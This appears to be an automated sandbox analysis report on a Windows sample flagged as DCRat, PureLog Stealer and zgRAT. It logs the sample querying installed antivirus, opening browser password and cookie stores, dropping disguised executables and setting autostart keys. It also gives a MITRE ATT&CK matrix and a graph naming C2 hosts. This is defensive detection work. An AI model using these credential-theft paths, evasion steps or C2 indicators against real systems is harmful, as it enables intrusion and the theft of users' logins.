                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeQueries volume information: C:\Windows\System32\r6Lr6XbTWt.exe VolumeInformation
                              Source: C:\Recovery\0eDO5Zbs.exeQueries volume information: C:\Recovery\0eDO5Zbs.exe VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeQueries volume information: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe VolumeInformation
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeQueries volume information: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe VolumeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeQueries volume information: C:\Users\user\Desktop\VQdUvAQ4xO.exe VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe VolumeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeQueries volume information: C:\Windows\System32\r6Lr6XbTWt.exe VolumeInformation
                              Source: C:\Recovery\0eDO5Zbs.exeQueries volume information: C:\Recovery\0eDO5Zbs.exe VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeQueries volume information: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe VolumeInformation
                              Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeQueries volume information: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe VolumeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeQueries volume information: C:\Users\user\Desktop\VQdUvAQ4xO.exe VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe VolumeInformation
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeQueries volume information: C:\Windows\System32\r6Lr6XbTWt.exe VolumeInformation
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: VQdUvAQ4xO.exe PID: 1216, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: r6Lr6XbTWt.exe PID: 7548, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: VQdUvAQ4xO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
                              Yara detected ReverseShell
                              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 1720, type: MEMORYSTR
                              Yara detected zgRAT
                              Source: Yara matchFile source: VQdUvAQ4xO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: VQdUvAQ4xO.exe PID: 1216, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: r6Lr6XbTWt.exe PID: 7548, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: VQdUvAQ4xO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
                              Yara detected ReverseShell
                              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 1720, type: MEMORYSTR
                              Yara detected zgRAT
                              Source: Yara matchFile source: VQdUvAQ4xO.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts141
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		11
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Web Service                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading                              		11
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory144
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		1
                              Ingress Tool Transfer                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt31
                              Registry Run Keys / Startup Folder                              		31
                              Registry Run Keys / Startup Folder                              		2
                              Obfuscated Files or Information                              		Security Account Manager341
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		11
                              Encrypted Channel                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Software Packing                              		NTDS1
                              Process Discovery                              		Distributed Component Object ModelInput Capture3
                              Non-Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets261
                              Virtualization/Sandbox Evasion                              		SSHKeylogging14
                              Application Layer Protocol                              		Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                              Masquerading                              		DCSync1
                              Remote System Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                              Virtualization/Sandbox Evasion                              		Proc Filesystem11
                              System Network Configuration Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1596749 Sample: VQdUvAQ4xO.exe Startdate: 22/01/2025 Architecture: WINDOWS Score: 100 78 api.telegram.org 2->78 80 525833cm.nyashnyash.ru 2->80 82 ipinfo.io 2->82 92 Suricata IDS alerts for network traffic 2->92 94 Antivirus detection for URL or domain 2->94 96 Antivirus detection for dropped file 2->96 100 17 other signatures 2->100 8 VQdUvAQ4xO.exe 26 35 2->8         started        13 tNOtXAG6xwxcUNu9tjBa.exe 2->13         started        15 0eDO5Zbs.exe 2->15         started        17 13 other processes 2->17 signatures3 98 Uses the Telegram API (likely for C&C communication) 78->98 process4 dnsIp5 86 api.telegram.org 149.154.167.220, 443, 49733, 49751 TELEGRAMRU United Kingdom 8->86 88 ipinfo.io 34.117.59.81, 443, 49731, 49732 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 8->88 62 C:\Windows\System32\r6Lr6XbTWt.exe, PE32 8->62 dropped 64 C:\Users\user\Desktop\vSXJQEeZ.log, PE32 8->64 dropped 66 C:\Users\user\Desktop\lkEtgbYs.log, PE32 8->66 dropped 74 16 other malicious files 8->74 dropped 112 Creates an undocumented autostart registry key 8->112 114 Creates multiple autostart registry keys 8->114 116 Creates an autostart registry key pointing to binary in C:\Windows 8->116 118 Adds a directory exclusion to Windows Defender 8->118 19 cmd.exe 8->19         started        22 csc.exe 4 8->22         started        25 powershell.exe 8->25         started        29 5 other processes 8->29 68 C:\Users\user\Desktop\xkMJxvqs.log, PE32 13->68 dropped 70 C:\Users\user\Desktop\oGDUNCaL.log, PE32 13->70 dropped 72 C:\Users\user\Desktop\hJPUkngW.log, PE32 13->72 dropped 76 4 other malicious files 13->76 dropped 27 cmd.exe 13->27         started        120 Antivirus detection for dropped file 15->120 122 Multi AV Scanner detection for dropped file 15->122 124 Machine Learning detection for dropped file 15->124 90 127.0.0.1 unknown unknown 17->90 file6 signatures7 process8 file9 102 Uses ping.exe to sleep 19->102 104 Drops executables to the windows directory (C:\Windows) and starts them 19->104 106 Uses ping.exe to check the status of other devices and networks 19->106 31 r6Lr6XbTWt.exe 19->31         started        46 3 other processes 19->46 52 C:\Windows\...\SecurityHealthSystray.exe, PE32 22->52 dropped 108 Infects executable files (exe, dll, sys, html) 22->108 34 conhost.exe 22->34         started        36 cvtres.exe 1 22->36         started        110 Loading BitLocker PowerShell Module 25->110 48 2 other processes 25->48 38 tNOtXAG6xwxcUNu9tjBa.exe 27->38         started        42 conhost.exe 27->42         started        44 conhost.exe 29->44         started        50 4 other processes 29->50 signatures10 process11 dnsIp12 126 Multi AV Scanner detection for dropped file 31->126 84 525833cm.nyashnyash.ru 104.21.95.93, 49739, 49741, 49742 CLOUDFLARENETUS United States 38->84 54 C:\Users\user\Desktop\wMeJBGvi.log, PE32 38->54 dropped 56 C:\Users\user\Desktop\oiVTRNgB.log, PE32 38->56 dropped 58 C:\Users\user\Desktop\nluLvNRG.log, PE32 38->58 dropped 60 4 other malicious files 38->60 dropped 128 Tries to harvest and steal browser information (history, passwords, etc) 38->128 file13 signatures14

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.